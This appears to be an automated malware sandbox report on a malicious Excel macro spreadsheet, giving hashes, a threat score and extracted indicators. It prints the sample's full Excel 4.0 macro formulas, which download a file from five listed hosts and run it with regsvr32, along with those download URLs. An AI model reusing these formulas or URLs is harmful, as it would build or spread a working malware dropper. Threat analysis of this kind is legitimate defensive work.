Overview

overview

10

Static

static

10

9a9ca5ea2f...3.xlsm

windows7-x64

10

9a9ca5ea2f...3.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9a9ca5ea2fb324b947bd58491c197862ecfaa86b98b5f9b421c334300c9f11a3

  • Size

    69KB

  • Sample

    241120-yhszcssfpr

  • MD5

    10d90a518a2cf0bd9e61114b2e32483f

  • SHA1

    8d9b00ad8a076ea6edef0f371534e8ef03500a7c

  • SHA256

    9a9ca5ea2fb324b947bd58491c197862ecfaa86b98b5f9b421c334300c9f11a3

  • SHA512

    5fdc0e2985de6c6ed0ebd20fe640f9da74c81b08958ff038f8fb58a24ef407cbd71e6e69e45a17c7d6b01db42f431dbe9179aabbb0fa7ded4072838868569f3f

  • SSDEEP

    1536:dp0b/XHTWhxndhjh/VwBpSZobSex7jB0FfuZibVyg:czWhxHjh88ZoH7juFuZiQg

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://vasilestudio.com/wp-admin/pZ1vbd5Z/

https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/

https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/

https://triclicks.net/wp-admin/bv/

https://thecanadianarab.com/wp-content/VJ/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vasilestudio.com/wp-admin/pZ1vbd5Z/","..\aua.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://triclicks.net/wp-admin/bv/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thecanadianarab.com/wp-content/VJ/","..\aua.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aua.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://vasilestudio.com/wp-admin/pZ1vbd5Z/
xlm40.dropper

https://estesgroup.net/New-site-25062021/UkQPppHG9pLNE/
xlm40.dropper

https://robointeligentedecomentarios.com/wp-includes/YBS9a02Y68auiEdP/
xlm40.dropper

https://triclicks.net/wp-admin/bv/
xlm40.dropper

https://thecanadianarab.com/wp-content/VJ/

Targets

    • Target

      9a9ca5ea2fb324b947bd58491c197862ecfaa86b98b5f9b421c334300c9f11a3

    • Size

      69KB

    • MD5

      10d90a518a2cf0bd9e61114b2e32483f

    • SHA1

      8d9b00ad8a076ea6edef0f371534e8ef03500a7c

    • SHA256

      9a9ca5ea2fb324b947bd58491c197862ecfaa86b98b5f9b421c334300c9f11a3

    • SHA512

      5fdc0e2985de6c6ed0ebd20fe640f9da74c81b08958ff038f8fb58a24ef407cbd71e6e69e45a17c7d6b01db42f431dbe9179aabbb0fa7ded4072838868569f3f

    • SSDEEP

      1536:dp0b/XHTWhxndhjh/VwBpSZobSex7jB0FfuZibVyg:czWhxHjh88ZoH7juFuZiQg

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks